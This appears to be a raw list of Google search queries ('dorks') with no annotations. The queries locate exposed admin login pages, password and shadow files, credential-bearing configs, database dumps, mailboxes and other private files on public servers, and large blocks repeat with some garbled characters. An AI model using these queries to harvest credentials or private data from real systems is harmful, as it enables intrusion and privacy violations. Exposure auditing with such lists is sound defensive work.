intitle:"VisNetic WebMail" inurl:"/mail/"
intitle:"VitalQIP IP Management System"
intitle:"VMware Management Interface:" inurl:"vmware/en/"
intitle:"VNC viewer for Java"
intitle:"web-cyradm"|"by Luc de Louw" "This is only for authorized users" -tar.gz -site:web-cyradm.org
intitle:"WebLogic Server" intitle:"Console Login" inurl:console
intitle:"Welcome Site/User Administrator" "Please select the language" -demos
intitle:"Welcome to Mailtraq WebMail"
intitle:"welcome to netware *" -site:novell.com
intitle:"WorldClient" intext:"? (2003|2004) Alt-N Technologies."
intitle:"xams 0.0.0..15 - Login"
intitle:"XcAuctionLite" | "DRIVEN BY XCENT" Lite inurl:admin
intitle:"XMail Web Administration Interface" intext:Login intext:password
intitle:"Zope Help System" inurl:HelpSys
intitle:"ZyXEL Prestige Router" "Enter password"
intitle:"inc. vpn 3000 concentrator"
intitle:("TrackerCam Live Video")|("TrackerCam Application Login")|("Trackercam Remote") -trackercam.com
intitle:asterisk.management.portal web-access
intitle:endymion.sak?.mail.login.page | inurl:sake.servlet
intitle:Group-Office "Enter your username and password to login"
intitle:ilohamail "
IlohaMail"
intitle:ilohamail intext:"Version 0.8.10" "
IlohaMail"
intitle:IMP inurl:imp/index.php3
intitle:Login * Webmailer
intitle:Login intext:"RT is ? Copyright"
intitle:Node.List Win32.Version.3.11
intitle:Novell intitle:WebAccess "Copyright *-* Novell, Inc"
intitle:open-xchange inurl:login.pl
intitle:Ovislink inurl:private/login
intitle:phpnews.login
intitle:plesk inurl:login.php3
inurl:"/admin/configuration. php?" Mystore
inurl:"/slxweb.dll/external?name=(custportal|webticketcust)"
inurl:"1220/parse_xml.cgi?"
inurl:"631/admin" (inurl:"op=*") | (intitle:CUPS)
inurl:":10000" intext:webmin
inurl:"Activex/default.htm" "Demo"
inurl:"calendar.asp?action=login"
inurl:"default/login.php" intitle:"kerio"
inurl:"gs/adminlogin.aspx"
inurl:"php121login.php"
inurl:"suse/login.pl"
inurl:"typo3/index.php?u=" -demo
inurl:"usysinfo?login=true"
inurl:"utilities/TreeView.asp"
inurl:"vsadmin/login" | inurl:"vsadmin/admin" inurl:.php|.asp

inurl:/admin/login.asp
inurl:/cgi-bin/sqwebmail?noframes=1
inurl:/Citrix/Nfuse17/
inurl:/dana-na/auth/welcome.html
inurl:/eprise/
inurl:/Merchant2/admin.mv | inurl:/Merchant2/admin.mvc | intitle:"Miva Merchant Administration Login" -inurl:cheap-malboro.net
inurl:/modcp/ intext:Moderator+vBulletin
inurl:/SUSAdmin intitle:"Microsoft Software upd?t? Services"
inurl:/webedit.* intext:WebEdit Professional -html
inurl:1810 "Oracle Enterprise Manager"
inurl:2000 intitle:RemotelyAnywhere -site:realvnc.com
inurl::2082/frontend -demo
inurl:administrator "welcome to mambo"
inurl:bin.welcome.sh | inurl:bin.welcome.bat | intitle:eHealth.5.0
inurl:cgi-bin/ultimatebb.cgi?ubb=login
inurl:Citrix/MetaFrame/default/default.aspx
inurl:confixx inurl:login|anmeldung
inurl:coranto.cgi intitle:Login (Authorized Users Only)
inurl:csCreatePro.cgi
inurl:default.asp intitle:"WebCommander"
inurl:exchweb/bin/auth/owalogon.asp
inurl:gnatsweb.pl
inurl:ids5web
inurl:irc filetype:cgi cgi:irc
inurl:login filetype:swf swf
inurl:login.asp
inurl:login.cfm
inurl:login.php "SquirrelMail version"
inurl:metaframexp/default/login.asp | intitle:"Metaframe XP Login"
inurl:mewebmail
inurl:names.nsf?opendatabase
inurl:ocw_login_username
inurl:orasso.wwsso_app_admin.ls_login
inurl:postfixadmin intitle:"postfix admin" ext:php
inurl:search/admin.php
inurl:textpattern/index.php
inurl:WCP_USER
inurl:webmail./index.pl "Interface"
inurl:webvpn.html "login" "Please enter your"

filetype:bak createobject sa
filetype:bak inurl:"htaccess|passwd|shadow|htusers"
filetype:cfg mrtg "target
filetype:cfm "cfapplication name" password
filetype:conf oekakibbs
filetype:conf slapd.conf
filetype:config config intext:appSettings "User ID"
filetype:dat "password.dat"
filetype:dat inurl:Sites.dat
filetype:dat wand.dat
filetype:inc dbconn
filetype:inc intext:mysql_connect
filetype:inc mysql_connect OR mysql_pconnect
filetype:inf sysprep
filetype:ini inurl:"serv-u.ini"
filetype:ini inurl:flashFXP.ini
filetype:ini ServUDaemon
filetype:ini wcx_ftp
filetype:ini ws_ftp pwd
filetype:ldb admin
filetype:log "See `ipsec --copyright"
filetype:log inurl:"password.log"
filetype:mdb inurl:users.mdb
filetype:mdb wwforum
filetype:netrc password
filetype:pass pass intext:userid
filetype:pem intext:private
filetype:properties inurl:db intext:password
filetype:pwd service
filetype:pwl pwl
filetype:reg reg +intext:"defaultusername" +intext:"defaultpassword"
filetype:reg reg +intext:Ã¢? WINVNC3Ã¢?
filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS
filetype:sql "insert into" (pass|passwd|password)
filetype:sql ("values * MD5" | "values * password" | "values * encrypt")
filetype:sql +"IDENTIFIED BY" -cvs
filetype:sql password
filetype:url +inurl:"ftp://" +inurl:";@"
filetype:xls username password email
htpasswd
htpasswd / htgroup
htpasswd / htpasswd.bak
intext:"enable password 7"
intext:"enable secret 5 $"
intext:"EZGuestbook"
intext:"Web Wiz Journal"
intitle:"index of" intext:connect.inc
intitle:"index of" intext:globals.inc
intitle:"Index of" passwords modified
intitle:"Index of" sc_serv.conf sc_serv content
intitle:"phpinfo()" +"mysql.default_password" +"Zend s?ri?ting Language Engine"
intitle:dupics inurl:(add.asp | default.asp | view.asp | voting.asp) -site:duware.com
intitle:index.of administrators.pwd
intitle:Index.of etc shadow
intitle:index.of intext:"secring.skr"|"secring.pgp"|"secring.bak"
intitle:rapidshare intext:login
inurl:"calendars?ri?t/users.txt"
inurl:"editor/list.asp" | inurl:"database_editor.asp" | inurl:"login.asa" "are set"
inurl:"GRC.DAT" intext:"password"
inurl:"Sites.dat"+"PASS="
inurl:"slapd.conf" intext:"credentials" -manpage -"Manual Page" -man: -sample
inurl:"slapd.conf" intext:"rootpw" -manpage -"Manual Page" -man: -sample
inurl:"wvdial.conf" intext:"password"
inurl:/db/main.mdb
inurl:/wwwboard
inurl:/yabb/Members/Admin.dat
inurl:ccbill filetype:log
inurl:cgi-bin inurl:calendar.cfg
inurl:chap-secrets -cvs
inurl:config.php dbuname dbpass
inurl:filezilla.xml -cvs
inurl:lilo.conf filetype:conf password -tatercounter2000 -bootpwd -man
inurl:nuke filetype:sql
inurl:ospfd.conf intext:password -sample -test -tutorial -download
inurl:pap-secrets -cvs
inurl:pass.dat
inurl:perform filetype:ini
inurl:perform.ini filetype:ini
inurl:secring ext:skr | ext:pgp | ext:bak
inurl:server.cfg rcon password
inurl:ventrilo_srv.ini adminpassword
inurl:vtund.conf intext:pass -cvs
inurl:zebra.conf intext:password -sample -test -tutorial -download

filetype:bkf bkf
filetype:blt "buddylist"
filetype:blt blt +intext:screenname
filetype:cfg auto_inst.cfg
filetype:cnf inurl:_vti_pvt access.cnf
filetype:conf inurl:firewall -intitle:cvs
filetype:config web.config -CVS
filetype:ctt Contact
filetype:ctt ctt messenger
filetype:eml eml +intext:"Subject" +intext:"From" +intext:"To"
filetype:fp3 fp3
filetype:fp5 fp5 -site:gov -site:mil -"cvs log"
filetype:fp7 fp7
filetype:inf inurl:capolicy.inf
filetype:lic lic intext:key
filetype:log access.log -CVS
filetype:log cron.log
filetype:mbx mbx intext:Subject
filetype:myd myd -CVS
filetype:ns1 ns1
filetype:ora ora
filetype:ora tnsnames
filetype:pdb pdb backup (Pilot | Pluckerdb)
filetype:php inurl:index inurl:phpicalendar -site:sourceforge.net
filetype:pot inurl:john.pot
filetype:PS ps
filetype:pst inurl:"outlook.pst"
filetype:pst pst -from -to -date
filetype:qbb qbb
filetype:QBW qbw
filetype:rdp rdp
filetype:reg "Terminal Server Client"
filetype:vcs vcs
filetype:wab wab
filetype:xls -site:gov inurl:contact
filetype:xls inurl:"email.xls"
Financial spreadsheets: finance.xls
Financial spreadsheets: finances.xls
Ganglia Cluster Reports
haccess.ctl (one way)
haccess.ctl (VERY reliable)
ICQ chat logs, please...
intext:"Session Start * * * *:*:* *" filetype:log
intext:"Tobias Oetiker" "traffic analysis"
intext:(password | passcode) intext:(username | userid | user) filetype:csv
intext:gmail invite intext:http://gmail.google.com/gmail/a
intext:SQLiteManager inurl:main.php
intext:ViewCVS inurl:Settings.php
intitle:"admin panel" +"RedKernel"
intitle:"Apache::Status" (inurl:server-status | inurl:status.html | inurl:apache.html)
intitle:"AppServ Open Project" -site:www.appservnetwork.com
intitle:"ASP Stats Generator *.*" "ASP Stats Generator" "2003-2004 weppos"
intitle:"Big Sister" +"OK Attention Trouble"
intitle:"curriculum vitae" filetype:doc
intitle:"edna:streaming mp3 server" -forums
intitle:"FTP root at"
intitle:"index of" +myd size
intitle:"Index Of" -inurl:maillog maillog size
intitle:"Index Of" cookies.txt size
intitle:"index of" mysql.conf OR mysql_config
intitle:"Index of" upload size parent directory
intitle:"index.of *" admin news.asp configview.asp
intitle:"index.of" .diz .nfo last modified
intitle:"Joomla - Web Installer"
intitle:"LOGREP - Log file reporting system" -site:itefix.no
intitle:"Multimon UPS status page"
intitle:"PHP Advanced Transfer" (inurl:index.php | inurl:showrecent.php )
intitle:"PhpMyExplorer" inurl:"index.php" -cvs
intitle:"statistics of" "advanced web statistics"
intitle:"System Statistics" +"System and Network Information Center"
intitle:"urchin (5|3|admin)" ext:cgi
intitle:"Usage Statistics for" "Generated by Webalizer"
intitle:"wbem" compaq login "Compaq Information Technologies Group"
intitle:"Web Server Statistics for ****"
intitle:"web server status" SSH Telnet
intitle:"Welcome to F-Secure Policy Manager Server Welcome Page"
intitle:"welcome.to.squeezebox"
intitle:admin intitle:login
intitle:Bookmarks inurl:bookmarks.html "Bookmarks
intitle:index.of "Apache" "server at"
intitle:index.of cleanup.log
intitle:index.of dead.letter
intitle:index.of inbox
intitle:index.of inbox dbx
intitle:index.of ws_ftp.ini
intitle:intranet inurl:intranet +intext:"phone"
inurl:"/axs/ax-admin.pl" -script
inurl:"/cricket/grapher.cgi"
inurl:"bookmark.htm"
inurl:"cacti" +inurl:"graph_view.php" +"Settings Tree View" -cvs -RPM
inurl:"newsletter/admin/"
inurl:"newsletter/admin/" intitle:"newsletter admin"
inurl:"putty.reg"
inurl:"smb.conf" intext:"workgroup" filetype:conf conf
inurl:*db filetype:mdb
inurl:/cgi-bin/pass.txt
inurl:/_layouts/settings
inurl:admin filetype:xls
inurl:admin intitle:login
inurl:backup filetype:mdb
inurl:build.err
inurl:cgi-bin/printenv
inurl:cgi-bin/testcgi.exe "Please distribute TestCGI"
inurl:changepassword.asp
inurl:ds.py
inurl:email filetype:mdb
inurl:fcgi-bin/echo
inurl:forum filetype:mdb
inurl:forward filetype:forward -cvs
inurl:getmsg.html intitle:hotmail
inurl:log.nsf -gov
inurl:main.php phpMyAdmin
inurl:main.php Welcome to phpMyAdmin
inurl:netscape.hst
inurl:netscape.hst
inurl:netscape.ini
inurl:odbc.ini ext:ini -cvs
inurl:perl/printenv
inurl:php.ini filetype:ini
inurl:preferences.ini "[emule]"
inurl:profiles filetype:mdb
inurl:report "EVEREST Home Edition "
inurl:server-info "Apache Server Information"
inurl:server-status "apache"
inurl:snitz_forums_2000.mdb
inurl:ssl.conf filetype:conf
inurl:tdbin
inurl:vbstats.php "page generated"
inurl:wp-mail.php + "There doesn't seem to be any new mail."
inurl:XcCDONTS.asp

intext:""BiTBOARD v2.0" BiTSHiFTERS Bulletin Board"
intext:"Fill out the form below completely to change your password and user name. If new username is left blank, your old one will be assumed." -edu
intext:"Mail admins login here to administrate your domain."
intext:"Master Account" "Domain Name" "Password" inurl:/cgi-bin/qmailadmin
intext:"Master Account" "Domain Name" "Password" inurl:/cgi-bin/qmailadmin
intext:"Storage Management Server for" intitle:"Server Administration"
intext:"Welcome to" inurl:"cp" intitle:"H-SPHERE" inurl:"begin.html" -Fee
intext:"vbulletin" inurl:admincp
intitle:"*- HP WBEM Login" | "You are being prompted to provide login account information for *" | "Please provide the information requested and press
intitle:"Admin Login" "admin login" "blogware"
intitle:"Admin login" "Web Site Administration" "Copyright"
intitle:"AlternC Desktop"
intitle:"Athens Authentication Point"
intitle:"b2evo > Login form" "Login form. You must log in! You will have to accept cookies in order to log in" -demo -site:b2evolution.net
intitle:"Cisco CallManager User Options Log On" "Please enter your User ID and Password in the spaces provided below and click the Log On button to co
intitle:"ColdFusion Administrator Login"
intitle:"communigate pro * *" intitle:"entrance"
intitle:"Content Management System" "user name"|"password"|"admin" "Microsoft IE 5.5" -mambo
intitle:"Content Management System" "user name"|"password"|"admin" "Microsoft IE 5.5" -mambo
intitle:"Dell Remote Access Controller"
intitle:"Docutek ERes - Admin Login" -edu
intitle:"Employee Intranet Login"
intitle:"eMule *" intitle:"- Web Control Panel" intext:"Web Control Panel" "Enter your password here."
intitle:"ePowerSwitch Login"
intitle:"eXist Database Administration" -demo
intitle:"EXTRANET * - Identification"
intitle:"EXTRANET login" -.edu -.mil -.gov
intitle:"EZPartner" -netpond
intitle:"Flash Operator Panel" -ext:php -wiki -cms -inurl:asternic -inurl:sip -intitle:ANNOUNCE -inurl:lists
intitle:"i-secure v1.1" -edu
intitle:"Icecast Administration Admin Page"
intitle:"iDevAffiliate - admin" -demo
intitle:"ISPMan : Unauthorized Access prohibited"
intitle:"ITS System Information" "Please log on to the SAP System"
intitle:"Kurant Corporation StoreSense" filetype:bok
intitle:"ListMail Login" admin -demo
intitle:"Login -
Easy File Sharing Web Server"
intitle:"Login Forum
AnyBoard" intitle:"If you are a new user:" intext:"Forum
AnyBoard" inurl:gochat -edu
intitle:"Login to @Mail" (ext:pl | inurl:"index") -dwaffleman
intitle:"Login to Cacti"
intitle:"Login to the forums - @www.aimoo.com" inurl:login.cfm?id=
intitle:"MailMan Login"
intitle:"Member Login" "NOTE: Your browser must have cookies enabled in order to log into the site." ext:php OR ext:cgi
intitle:"Merak Mail Server Web Administration" -ihackstuff.com
intitle:"microsoft certificate services" inurl:certsrv
intitle:"MikroTik RouterOS Managing Webpage"
intitle:"MX Control Console" "If you can't remember"
intitle:"Novell Web Services" "GroupWise" -inurl:"doc/11924" -.mil -.edu -.gov -filetype:pdf
intitle:"Novell Web Services" intext:"Select a service and a language."
intitle:"oMail-admin Administration - Login" -inurl:omnis.ch
intitle:"OnLine Recruitment Program - Login"
intitle:"Philex 0.2*" -script -site:freelists.org
intitle:"PHP Advanced Transfer" inurl:"login.php"
intitle:"php icalendar administration" -site:sourceforge.net
intitle:"php icalendar administration" -site:sourceforge.net
intitle:"phpPgAdmin - Login" Language
intitle:"PHProjekt - login" login password
intitle:"please login" "your password is *"
intitle:"Remote Desktop Web Connection" inurl:tsweb
intitle:"SFXAdmin - sfx_global" | intitle:"SFXAdmin - sfx_local" | intitle:"SFXAdmin - sfx_test"
intitle:"SHOUTcast Administrator" inurl:admin.cgi
intitle:"site administration: please log in" "site designed by emarketsouth"
intitle:"Supero Doctor III" -inurl:supermicro
intitle:"SuSE Linux Openexchange Server" "Please activate JavaScript!"
intitle:"teamspeak server-administration
intitle:"Tomcat Server Administration"
intitle:"TOPdesk ApplicationServer"
intitle:"TUTOS Login"
intitle:"TWIG Login"
intitle:"vhost" intext:"vHost . 2000-2004"
intitle:"Virtual Server Administration System"
intitle:"VisNetic WebMail" inurl:"/mail/"
intitle:"VitalQIP IP Management System"
intitle:"VMware Management Interface:" inurl:"vmware/en/"
intitle:"VNC viewer for Java"
intitle:"web-cyradm"|"by Luc de Louw" "This is only for authorized users" -tar.gz -site:web-cyradm.org
intitle:"WebLogic Server" intitle:"Console Login" inurl:console
intitle:"Welcome Site/User Administrator" "Please select the language" -demos
intitle:"Welcome to Mailtraq WebMail"
intitle:"welcome to netware *" -site:novell.com
intitle:"WorldClient" intext:"? (2003|2004) Alt-N Technologies."
intitle:"xams 0.0.0..15 - Login"
intitle:"XcAuctionLite" | "DRIVEN BY XCENT" Lite inurl:admin
intitle:"XMail Web Administration Interface" intext:Login intext:password
intitle:"Zope Help System" inurl:HelpSys
intitle:"ZyXEL Prestige Router" "Enter password"
intitle:"inc. vpn 3000 concentrator"
intitle:("TrackerCam Live Video")|("TrackerCam Application Login")|("Trackercam Remote") -trackercam.com
intitle:asterisk.management.portal web-access
intitle:endymion.sak?.mail.login.page | inurl:sake.servlet
intitle:Group-Office "Enter your username and password to login"
intitle:ilohamail "

IlohaMail"
intitle:ilohamail intext:"Version 0.8.10" "
IlohaMail"
intitle:IMP inurl:imp/index.php3
intitle:Login * Webmailer
intitle:Login intext:"RT is ? Copyright"
intitle:Node.List Win32.Version.3.11
intitle:Novell intitle:WebAccess "Copyright *-* Novell, Inc"
intitle:open-xchange inurl:login.pl
intitle:Ovislink inurl:private/login
intitle:phpnews.login
intitle:plesk inurl:login.php3
inurl:"/admin/configuration. php?" Mystore
inurl:"/slxweb.dll/external?name=(custportal|webticketcust)"
inurl:"1220/parse_xml.cgi?"
inurl:"631/admin" (inurl:"op=*") | (intitle:CUPS)
inurl:":10000" intext:webmin
inurl:"Activex/default.htm" "Demo"
inurl:"calendar.asp?action=login"
inurl:"default/login.php" intitle:"kerio"
inurl:"gs/adminlogin.aspx"
inurl:"php121login.php"
inurl:"suse/login.pl"
inurl:"typo3/index.php?u=" -demo
inurl:"usysinfo?login=true"
inurl:"utilities/TreeView.asp"
inurl:"vsadmin/login" | inurl:"vsadmin/admin" inurl:.php|.asp
nurl:/admin/login.asp
inurl:/cgi-bin/sqwebmail?noframes=1
inurl:/Citrix/Nfuse17/
inurl:/dana-na/auth/welcome.html
inurl:/eprise/
inurl:/Merchant2/admin.mv | inurl:/Merchant2/admin.mvc | intitle:"Miva Merchant Administration Login" -inurl:cheap-malboro.net
inurl:/modcp/ intext:Moderator+vBulletin
inurl:/SUSAdmin intitle:"Microsoft Software Update Services"
inurl:/webedit.* intext:WebEdit Professional -html
inurl:1810 "Oracle Enterprise Manager"
inurl:2000 intitle:RemotelyAnywhere -site:realvnc.com
inurl::2082/frontend -demo
inurl:administrator "welcome to mambo"
inurl:bin.welcome.sh | inurl:bin.welcome.bat | intitle:eHealth.5.0
inurl:cgi-bin/ultimatebb.cgi?ubb=login
inurl:Citrix/MetaFrame/default/default.aspx
inurl:confixx inurl:login|anmeldung
inurl:coranto.cgi intitle:Login (Authorized Users Only)
inurl:csCreatePro.cgi
inurl:default.asp intitle:"WebCommander"
inurl:exchweb/bin/auth/owalogon.asp
inurl:gnatsweb.pl
inurl:ids5web
inurl:irc filetype:cgi cgi:irc
inurl:login filetype:swf swf
inurl:login.asp
inurl:login.cfm
inurl:login.php "SquirrelMail version"
inurl:metaframexp/default/login.asp | intitle:"Metaframe XP Login"
inurl:mewebmail
inurl:names.nsf?opendatabase
inurl:ocw_login_username
inurl:orasso.wwsso_app_admin.ls_login
inurl:postfixadmin intitle:"postfix admin" ext:php
inurl:search/admin.php
inurl:textpattern/index.php
inurl:WCP_USER
inurl:webmail./index.pl "Interface"
inurl:webvpn.html "login" "Please enter your"
Login ("

admin account info" filetype:log
!Host=*.* intext:enc_UserPassword=* ext:pcf
"# -FrontPage-" ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-" inurl:service.pwd
"AutoCreate=TRUE password=*"
"http://*:*@www" domainname
"index of/" "ws_ftp.ini" "parent directory"
"liveice configuration file" ext:cfg -site:sourceforge.net
"parent directory" +proftpdpasswd
Duclassified" -site:duware.com "DUware All Rights reserved"
duclassmate" -site:duware.com
Dudirectory" -site:duware.com
dudownload" -site:duware.com
Elite Forum Version *.*"
Link Department"
"sets mode: +k"
"your password is" filetype:log
DUpaypal" -site:duware.com
allinurl: admin mdb
auth_user_file.txt
config.php
eggdrop filetype:user user
enable password | secret "current configuration" -intext:the
etc (index.of)
ext:asa | ext:bak intext:uid intext:pwd -"uid..pwd" database | server | dsn
ext:inc "pwd=" "UID="
ext:ini eudora.ini
ext:ini Version=4.0.0.4 password
ext:passwd -intext:the -sample -example
ext:txt inurl:unattend.txt
ext:yml database inurl:config

LeapFTP intitle:"index.of./" sites.ini modified
master.passwd
mysql history files
NickServ registration passwords
passlist
passlist.txt (a better way)
passwd
passwd / etc (reliable)
people.lst
psyBNC config files
pwd.db
server-dbs "intitle:index of"
signin filetype:url
spwd.db / passwd
trillian.ini
wwwboard WebAdmin inurl:passwd.txt wwwboard|webadmin
[WFClient] Password= filetype:ica
intitle:"remote assessment" OpenAanval Console
intitle:opengroupware.org "resistance is obsolete" "Report Bugs" "Username" "password"
"bp blog admin" intitle:login | intitle:admin -site:johnny.ihackstuff.com
"Emergisoft web applications are a part of our"
"Establishing a secure Integrated Lights Out session with" OR intitle:"Data Frame - Browser not HTTP 1.1 compatible" OR intitle:"HP Integrated Lights-
"HostingAccelerator" intitle:"login" +"Username" -"news" -demo
"iCONECT 4.1 :: Login"
"IMail Server Web Messaging" intitle:login
"inspanel" intitle:"login" -"cannot" "Login ID" -site:inspediumsoft.com
"intitle:3300 Integrated Communications Platform" inurl:main.htm
"Login - Sun Cobalt RaQ"
"login prompt" inurl:GM.cgi
"Login to Usermin" inurl:20000
"Microsoft CRM : Unsupported Browser Version"
"OPENSRS Domain Management" inurl:manage.cgi
"pcANYWHERE EXPRESS Java Client"
"Please authenticate yourself to get access to the management interface"
"please log in"
"Please login with admin pass" -"leak" -sourceforge
CuteNews" "2003..2005 CutePHP"
DWMail" password intitle:dwmail
Merak Mail Server Software" -.gov -.mil -.edu -site:merakmailserver.com
Midmart Messageboard" "Administrator Login"
Monster Top List" MTL numrange:200-
UebiMiau" -site:sourceforge.net
"site info for" "Enter Admin Password"
"SquirrelMail version" "By the SquirrelMail development Team"
"SysCP - login"
"This is a restricted Access Server" "Javas?ri?t Not Enabled!"|"Messenger Express" -edu -ac
"This section is for Administrators only. If you are an administrator then please"
"ttawlogin.cgi/?action="
"VHCS Pro ver" -demo
"VNC Desktop" inurl:5800
"Web-Based Management" "Please input password to login" -inurl:johnny.ihackstuff.com
"WebExplorer Server - Login" "Welcome to WebExplorer Server"
"WebSTAR Mail - Please Log In"
"You have requested access to a restricted area of our website. Please authenticate yourself to continue."
"You have requested to access the management functions" -.edu
(intitle:"Please login - Forums
UBB.threads")|(inurl:login.php "ubb")
(intitle:"Please login - Forums
WWWThreads")|(inurl:"wwwthreads/login.php")|(inurl:"wwwthreads/login.pl?Cat=")
(intitle:"rymo Login")|(intext:"Welcome to rymo") -family
(intitle:"WmSC e-Cart Administration")|(intitle:"WebMyStyle e-Cart Administration")
(inurl:"ars/cgi-bin/arweb?O=0" | inurl:arweb.jsp) -site:remedy.com -site:mil
4images Administration Control Panel
allintitle:"Welcome to the Cyclades"
allinurl:"exchange/logon.asp"
allinurl:wps/portal/ login
ASP.login_aspx "ASP.NET_SessionId"
CGI:IRC Login
ext:cgi intitle:"control panel" "enter your owner password to continue!"
ez Publish administration
filetype:php inurl:"webeditor.php"
filetype:pl "Download: SuSE Linux Openexchange Server CA"
filetype:r2w r2w

Easy File Sharing Web Server"
intitle:"Login Forum
AnyBoard" intitle:"If you are a new user:" intext:"Forum
AnyBoard" inurl:gochat -edu
Login ("
Jetbox One CMS Ã¢?Â¢" | "
Jetstream ? *")
Novell NetWare intext:"netware management portal version"
Outlook Web Access (a better way)
PhotoPost PHP Upload
PHPhotoalbum Statistics
PHPhotoalbum Upload
phpWebMail
Please enter a valid password! inurl:polladmin

INDEXU
Ultima Online loginservers
W-Nailer Upload Area
intitle:"DocuShare" inurl:"docushare/dsweb/" -faq -gov -edu
"#mysql dump" filetype:sql
"#mysql dump" filetype:sql 21232f297a57a5a743894a0e4a801fc3
"allow_call_time_pass_reference" "PATH_INFO"
"Certificate Practice Statement" inurl:(PDF | DOC)
"Generated by phpSystem"
"generated by wwwstat"
"Host Vulnerability Summary Report"
"HTTP_FROM=googlebot" googlebot.com "Server_Software="
"Index of" / "chat/logs"
"Installed Objects Scanner" inurl:default.asp
"MacHTTP" filetype:log inurl:machttp.log
"Mecury Version" "Infastructure Group"
"Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C)" ext:log
"Most Submitted Forms and s?ri?ts" "this section"
"Network Vulnerability Assessment Report"
"not for distribution" confidential
"not for public release" -.edu -.gov -.mil
"phone * * *" "address *" "e-mail" intitle:"curriculum vitae"
"phpMyAdmin" "running on" inurl:"main.php"
"produced by getstats"
"Request Details" "Control Tree" "Server Variables"
"robots.txt" "Disallow:" filetype:txt
"Running in Child mode"
"sets mode: +p"
"sets mode: +s"
"Thank you for your order" +receipt
"This is a Shareaza Node"
"This report was generated by WebLog"
( filetype:mail | filetype:eml | filetype:mbox | filetype:mbx ) intext:password|subject
(intitle:"PRTG Traffic Grapher" inurl:"allsensors")|(intitle:"PRTG Traffic Grapher - Monitoring Results")
(intitle:WebStatistica inurl:main.php) | (intitle:"WebSTATISTICA server") -inurl:statsoft -inurl:statsoftsa -inurl:statsoftinc.com -edu -software -rob
(inurl:"robot.txt" | inurl:"robots.txt" ) intext:disallow filetype:txt
+":8080" +":3128" +":80" filetype:txt
+"HSTSNR" -"netop.com"
-site:php.net -"The PHP Group" inurl:source inurl:url ext:pHp
94FBR "ADOBE PHOTOSHOP"
AIM buddy lists
allinurl:/examples/jsp/snp/snoop.jsp
allinurl:cdkey.txt
allinurl:servlet/SnoopServlet
cgiirc.conf
cgiirc.conf
contacts ext:wml
data filetype:mdb -site:gov -site:mil
exported email addresses
ext:(doc | pdf | xls | txt | ps | rtf | odt | sxw | psw | ppt | pps | xml) (intext:confidential salary | intext:"budget approved") inurl:confidential
ext:asp inurl:pathto.asp
ext:ccm ccm -catacomb
ext:CDX CDX
ext:cgi inurl:editcgi.cgi inurl:file=
ext:conf inurl:rsyncd.conf -cvs -man
ext:conf NoCatAuth -cvs
ext:dat bpk.dat
ext:gho gho
ext:ics ics
ext:ini intext:env.ini
ext:jbf jbf
ext:ldif ldif
ext:log "Software: Microsoft Internet Information Services *.*"
ext:mdb inurl:*.mdb inurl:fpdb shop.mdb
ext:nsf nsf -gov -mil
ext:plist filetype:plist inurl:bookmarks.plist
ext:pqi pqi -database
ext:reg "username=*" putty
ext:txt "Final encryption key"
ext:txt inurl:dxdiag
ext:vmdk vmdk
ext:vmx vmx
filetype:asp DBQ=" * Server.MapPath("*.mdb")
filetype:bkf bkf
filetype:blt "buddylist"
filetype:blt blt +intext:screenname
filetype:cfg auto_inst.cfg
filetype:cnf inurl:_vti_pvt access.cnf
filetype:conf inurl:firewall -intitle:cvs
filetype:config web.config -CVS
filetype:ctt Contact
filetype:ctt ctt messenger
filetype:eml eml +intext:"Subject" +intext:"From" +intext:"To"
filetype:fp3 fp3
filetype:fp5 fp5 -site:gov -site:mil -"cvs log"
filetype:fp7 fp7
filetype:inf inurl:capolicy.inf
filetype:lic lic intext:key
filetype:log access.log -CVS
filetype:log cron.log
filetype:mbx mbx intext:Subject
filetype:myd myd -CVS
filetype:ns1 ns1
filetype:ora ora
filetype:ora tnsnames
filetype:pdb pdb backup (Pilot | Pluckerdb)
filetype:php inurl:index inurl:phpicalendar -site:sourceforge.net
filetype:pot inurl:john.pot
filetype:PS ps
filetype:pst inurl:"outlook.pst"
filetype:pst pst -from -to -date
filetype:qbb qbb
filetype:QBW qbw
filetype:rdp rdp
filetype:reg "Terminal Server Client"
filetype:vcs vcs
filetype:wab wab
filetype:xls -site:gov inurl:contact
filetype:xls inurl:"email.xls"
Financial spreadsheets: finance.xls
Financial spreadsheets: finances.xls

Ganglia Cluster Reports
haccess.ctl (one way)
haccess.ctl (VERY reliable)
ICQ chat logs, please...
intext:"Session Start * * * *:*:* *" filetype:log
intext:"Tobias Oetiker" "traffic analysis"
intext:(password | passcode) intext:(username | userid | user) filetype:csv
intext:gmail invite intext:http://gmail.google.com/gmail/a
intext:SQLiteManager inurl:main.php
intext:ViewCVS inurl:Settings.php
intitle:"admin panel" +"
RedKernel"
intitle:"Apache::Status" (inurl:server-status | inurl:status.html | inurl:apache.html)
intitle:"AppServ Open Project" -site:www.appservnetwork.com
intitle:"ASP Stats Generator *.*" "ASP Stats Generator" "2003-2004 weppos"
intitle:"Big Sister" +"OK Attention Trouble"
intitle:"curriculum vitae" filetype:doc
intitle:"edna:streaming mp3 server" -forums
intitle:"FTP root at"
intitle:"index of" +myd size
intitle:"Index Of" -inurl:maillog maillog size
intitle:"Index Of" cookies.txt size
intitle:"index of" mysql.conf OR mysql_config
intitle:"Index of" upload size parent directory
intitle:"index.of *" admin news.asp configview.asp
intitle:"index.of" .diz .nfo last modified
intitle:"Joomla - Web Installer"
intitle:"LOGREP - Log file reporting system" -site:itefix.no
intitle:"Multimon UPS status page"
intitle:"PHP Advanced Transfer" (inurl:index.php | inurl:showrecent.php )
intitle:"PhpMyExplorer" inurl:"index.php" -cvs
intitle:"statistics of" "advanced web statistics"
intitle:"System Statistics" +"System and Network Information Center"
intitle:"urchin (5|3|admin)" ext:cgi
intitle:"Usage Statistics for" "Generated by Webalizer"
intitle:"wbem" compaq login "Compaq Information Technologies Group"
intitle:"Web Server Statistics for ****"
intitle:"web server status" SSH Telnet
intitle:"Welcome to F-Secure Policy Manager Server Welcome Page"
intitle:"welcome.to.squeezebox"
intitle:admin intitle:login
intitle:Bookmarks inurl:bookmarks.html "Bookmarks
intitle:index.of "Apache" "server at"
intitle:index.of cleanup.log
intitle:index.of dead.letter
intitle:index.of inbox
intitle:index.of inbox dbx
intitle:index.of ws_ftp.ini
intitle:intranet inurl:intranet +intext:"phone"
inurl:"/axs/ax-admin.pl" -s?ri?t
inurl:"/cricket/grapher.cgi"
inurl:"bookmark.htm"
inurl:"cacti" +inurl:"graph_view.php" +"Settings Tree View" -cvs -RPM
inurl:"newsletter/admin/"
